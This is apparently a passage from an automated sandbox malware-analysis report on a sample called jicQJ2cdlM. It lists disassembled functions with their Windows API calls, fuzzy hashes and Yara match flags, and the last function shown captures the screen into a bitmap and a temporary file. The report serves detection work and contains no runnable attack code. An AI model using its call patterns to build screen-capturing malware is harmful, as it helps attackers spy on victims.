                                                                                      • Part of subcall function 0042E40D: EnterCriticalSection.KERNEL32(?,?,00431C9A,?,00457A38,00000008,00431D68,?,?,?), ref: 0042E41C
                                                                                    • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 00434E25
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1272433827-0
                                                                                    • Opcode ID: 7994b66f8d059e0a4ea4c0566bc6fd84287e6518e046040a995cb3296bdf7f9b
                                                                                    • Instruction ID: 31781df083fb6f98b94d2300e169204e9eab98a1842135cb0ce39f8875023ccf
                                                                                    • Opcode Fuzzy Hash: 7994b66f8d059e0a4ea4c0566bc6fd84287e6518e046040a995cb3296bdf7f9b
                                                                                    • Instruction Fuzzy Hash: 57F04F32A103009FD754EF69E906B8D77E0AB49726F10426AF910DB2E2CB7999848F49
                                                                                    Function 00A15054 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00A0E674: RtlEnterCriticalSection.NTDLL(00590DD4), ref: 00A0E683
                                                                                    • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 00A1508C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1272433827-0
                                                                                    • Opcode ID: 91255582852f62f49bbb7f6d609e28063f3a8d390254579dd7c371b3acb579f0
                                                                                    • Instruction ID: 1b8e9ca62c5238b04c7ee440f2c01bc80b8305499b3ee761ed8e1cddbc5a60aa
                                                                                    • Opcode Fuzzy Hash: 91255582852f62f49bbb7f6d609e28063f3a8d390254579dd7c371b3acb579f0
                                                                                    • Instruction Fuzzy Hash: 2EF04F32A10304DFE710EF68E906B9D77E0AF45721F104265FA10DB2E2DB759954CB4A
                                                                                    Function 0043B2A2 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,?,?,?,0043BA64,004307D5,?,?,?,?,?,004307D5,?,?,?), ref: 0043B2D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                    • String ID:
                                                                                    • API String ID: 2016158738-0
                                                                                    • Opcode ID: 5abaff1671bb674c6eafe0f2cce25488b1c0be8fa004c8119abb9d1d27339480
                                                                                    • Instruction ID: 792a508546450a8c62dd781f30710cea9d26762123306e32df2f83f98e4bbb46
                                                                                    • Opcode Fuzzy Hash: 5abaff1671bb674c6eafe0f2cce25488b1c0be8fa004c8119abb9d1d27339480
                                                                                    • Instruction Fuzzy Hash: 62F0203A30020497CB04AF7AD85A76BBF90EBC5B54F0A409AEF098B250C6399842C798
                                                                                    Function 00A1B509 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                    • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,?,?,?,00A1BCCB,00A10A3C,?,?,?,?,?,00A10A3C,?,?,?), ref: 00A1B540
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                    • String ID:
                                                                                    • API String ID: 2016158738-0
                                                                                    • Opcode ID: 7e45c69b4bd48ea0a58e1bc64ad8673d17a770c848b88e6c6a4e287bad9e638c
                                                                                    • Instruction ID: 1f435fe71051086b0f98f46638e0a9440f8ffc3f51c7dca12dc4f853fcf7917d
                                                                                    • Opcode Fuzzy Hash: 7e45c69b4bd48ea0a58e1bc64ad8673d17a770c848b88e6c6a4e287bad9e638c
                                                                                    • Instruction Fuzzy Hash: AFF0553A30020457CB04AF3ADC057AABF90EFC1B60F0A0059EF0A8B250C371D882C7A0
                                                                                    Function 00410686 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00010692,0040FC1E), ref: 0041068B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                    • Instruction ID: 98c1b70154c3c6394ebbf277c14e22134dfc73ab602bc766ac458664b600bd4b
                                                                                    • Opcode Fuzzy Hash: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Function 009F08ED Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00410692,009EFE85), ref: 009F08F2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                    • Instruction ID: 98c1b70154c3c6394ebbf277c14e22134dfc73ab602bc766ac458664b600bd4b
                                                                                    • Opcode Fuzzy Hash: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Function 0043BBE1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
                                                                                    • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                    • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                    • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                    • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                    Function 004373F9 Relevance: .6, Instructions: 637COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                    • Instruction ID: b4093df590a21e34b028a8b1fc7d27a52c9cbab165512cb59d6a43ae298a81d2
                                                                                    • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                    • Instruction Fuzzy Hash: 61324661D68F014DE7339634C822336A698AFBB3D4F15E737F859B5EA6EB28C4834105
                                                                                    Function 004071D0 Relevance: .4, Instructions: 378COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e46bd4f707ba7a9ceb031d9cd86521102eb103cae0c179e5e6aa0592395d1ff4
                                                                                    • Instruction ID: 8d7dcf63c468df939a74f501716ec15b8f2183c69ee07cfca9113f75d84f5853
                                                                                    • Opcode Fuzzy Hash: e46bd4f707ba7a9ceb031d9cd86521102eb103cae0c179e5e6aa0592395d1ff4
                                                                                    • Instruction Fuzzy Hash: C3E19270A08612EFD714CF24C590AAAB7F1FF44304B14456ED856ABB81D738FC61DB96
                                                                                    Function 00A0770B Relevance: .4, Instructions: 356COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 00d6ba4a2d84f0801e1b0a96c170955ef3db55fa66fb4acd58968073f34e18d5
                                                                                    • Instruction ID: 9500f31f2303ac19b948a61274fd077730a862ccbbb45c154d4ccc04032aef42
                                                                                    • Opcode Fuzzy Hash: 00d6ba4a2d84f0801e1b0a96c170955ef3db55fa66fb4acd58968073f34e18d5
                                                                                    • Instruction Fuzzy Hash: 4CD1E372A0C1AA0ACB6D4B39947003EBFF16A523A131E879DD4F7CA5C2ED34F954D660
                                                                                    Function 00427D87 Relevance: .3, Instructions: 254COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                    • Instruction ID: 80968e5e8bc017810328c9ff139e3a08396a4cd6bf5f0c598f5f88a651707172
                                                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                    • Instruction Fuzzy Hash: C691743230D0B34ADB29463DA53413FFFE15E523A139A079FE4F2CA2C5EE289954D624
                                                                                    Function 00A07FEE Relevance: .3, Instructions: 254COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                    • Instruction ID: f150b23d98c92a2c86a827cfebad9da140799b700c36dfc9257e46a82b3ddc1c
                                                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                    • Instruction Fuzzy Hash: 859196722090A74EDB2D473AA47403EFFF15E523A131A079ED4F2CB1C1EE28D569D624
                                                                                    Function 00428042 Relevance: .2, Instructions: 244COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                    • Instruction ID: 6d209accfb2b0f61ed35da4827d98296029fd821660f9634528c43e98a7d9207
                                                                                    • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                    • Instruction Fuzzy Hash: D491933230A0B34ADB69423D947403FFFE15A523A135A079FD4F2CA2C5EE189569E638
                                                                                    Function 00A082A9 Relevance: .2, Instructions: 244COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                    • Instruction ID: db682aa4f884dd87558f50b626093ea5f873cd445ae06c2746670bc5d85cea41
                                                                                    • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                    • Instruction Fuzzy Hash: B991957210D0A74EDB69433AA53403EFFE15A927A131A079DD4F2CF1C1EE28D964EA24
                                                                                    Function 00427AC0 Relevance: .2, Instructions: 240COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                    • Instruction ID: c950a799e81b9798c69e1fde7feb5263e7a66bddbd8f12dc999fd4da67e98d8e
                                                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                    • Instruction Fuzzy Hash: 02915F7230D0B34ADB29463EA47403EFFE15A523A539A079FD4F2CB2C1EE189665D624
                                                                                    Function 00A07D27 Relevance: .2, Instructions: 240COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                    • Instruction ID: 59b488d9484ceb87ea9ab88ecc45b1898b37486adcbd3b0ce77fa71b8faa840e
                                                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                    • Instruction Fuzzy Hash: 02918172A0D0AB0EDB294339957443EFFE15E513A131A079EE4F2CB1C1EE34E964DA20
                                                                                    Function 0042D50E Relevance: .2, Instructions: 237COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ae41838ee76994b482650b7261a05257237b420b1ccb6a01709a4d1c62f7e11e
                                                                                    • Instruction ID: bf5b32470415164d0bde1c399ad2a9f6c2d5fa579297b3e458aa86cae917bf69
                                                                                    • Opcode Fuzzy Hash: ae41838ee76994b482650b7261a05257237b420b1ccb6a01709a4d1c62f7e11e
                                                                                    • Instruction Fuzzy Hash: 5F6132A1F0073866DB389A287895BBF23949F42748FE0051BE846DB3C1D69D9DC2C75E
                                                                                    Function 00A0D775 Relevance: .2, Instructions: 237COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                    • Instruction ID: b479bcbbc482c61ecc3dcd90a2719144ab6bbb183283f2adea3bf716b5bd3eb0
                                                                                    • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                    • Instruction Fuzzy Hash: 7461863360070CAADB389BECB991BBE73A5AF41744F14881AE983DF6C1D651DD4AC315
                                                                                    Function 00427816 Relevance: .2, Instructions: 232COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                    • Instruction ID: 70ade5293ce95a995033036da66bd690249c8a0141dd443be95812c5f6c87ab8
                                                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                    • Instruction Fuzzy Hash: 7381827230C0B34AEB29463E957843FFFE15A523A135A179FD4F2CA2C1EE18C694D624
                                                                                    Function 00A07A7D Relevance: .2, Instructions: 232COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                    • Instruction ID: 7083f026804f7f9f183b59be2bf6f5b05e89cc4dbc8615a59435252acc35443e
                                                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                    • Instruction Fuzzy Hash: EE815472A0D0A74EEB69473AA47443EFFE15A523A131A079DD4F3CB1C1EE34A964D620
                                                                                    Function 00428580 Relevance: .1, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                    • Instruction ID: 93e5daa5636be076332bd1d1c6ab8ee00e3655dcebceb5ec59e252ebbac9be67
                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                    • Instruction Fuzzy Hash: 69113B7730307153D6048A2DF8B45BF9795EBC53207ED426FD0418B749CE2AE9819508
                                                                                    Function 00A087E7 Relevance: .1, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                    • Instruction ID: 6bc02a72f4586d19e35343edc7457444d975934c3e51781b7197aea3b52a4bb1
                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                    • Instruction Fuzzy Hash: 4311087720104943D658873DF4B46BBA795EBC53A07ACC27AD0C14B6D8DF2AD94CD60C
                                                                                    Function 007F9B2B Relevance: .1, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 007F9000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7f9000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                    • Instruction ID: 245d69652a38a93896a0d09baee0e320ceabd7a90177dcc4ea3cc90043329f0b
                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                    • Instruction Fuzzy Hash: AB1170B2340104AFDB44DF55EC85FA673EAEB88320B298055EE08CB316D67AEC01C760
                                                                                    Function 009E0D90 Relevance: .0, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                    • Instruction ID: 704565790464fe3c3f0ddf7021649054d52fb9a753845345f40e7cf7b61d0324
                                                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                    • Instruction Fuzzy Hash: 890184766006458FDB22CF65CC04BAA33A9EBC5315F4544B9D506DB281E7B4ADC18F90
                                                                                    Function 00402116 Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402151
                                                                                    • GetClientRect.USER32(?,?), ref: 00402166
                                                                                    • GetDC.USER32(?), ref: 0040216D
                                                                                    • CreateSolidBrush.GDI32(00646464), ref: 00402180
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00402194
                                                                                    • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 0040219F
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004021AD
                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021C0
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021CB
                                                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 004021D4
                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021F8
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00402206
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00402283
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00402292
                                                                                    • _wcslen.LIBCMT ref: 0040229B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                    • String ID: Tahoma
                                                                                    • API String ID: 3832963559-3580928618
                                                                                    • Opcode ID: abba52d6847b12fe0ef92b8c09c3f71f9fb3bd9472e68441846bf1e5ef91a6b5
                                                                                    • Instruction ID: 010c8dd0ade12b0eef00d8562bcf10ebda5dfd6cd9d9fcac1ad08c501085cdf2
                                                                                    • Opcode Fuzzy Hash: abba52d6847b12fe0ef92b8c09c3f71f9fb3bd9472e68441846bf1e5ef91a6b5
                                                                                    • Instruction Fuzzy Hash: E871FD72900228AFDB22DF64DD85FAEB7BCEB09B11F0041A5B609E6151DA74AF81CF14
                                                                                    Function 00402591 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?), ref: 004025ED
                                                                                    • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025FF
                                                                                    • ReleaseCapture.USER32 ref: 00402612
                                                                                    • GetDC.USER32(00000000), ref: 00402639
                                                                                    • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026C0
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 004026C9
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004026D3
                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 00402701
                                                                                    • ShowWindow.USER32(?,00000000), ref: 0040270A
                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0040271C
                                                                                    • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402737
                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402751
                                                                                    • DeleteDC.GDI32(00000000), ref: 00402758
                                                                                    • DeleteObject.GDI32(00000000), ref: 0040275F
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0040276D
                                                                                    • DestroyWindow.USER32(?), ref: 00402774
                                                                                    • SetCapture.USER32(?), ref: 004027C1
                                                                                    • GetDC.USER32(00000000), ref: 004027F5
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0040280B
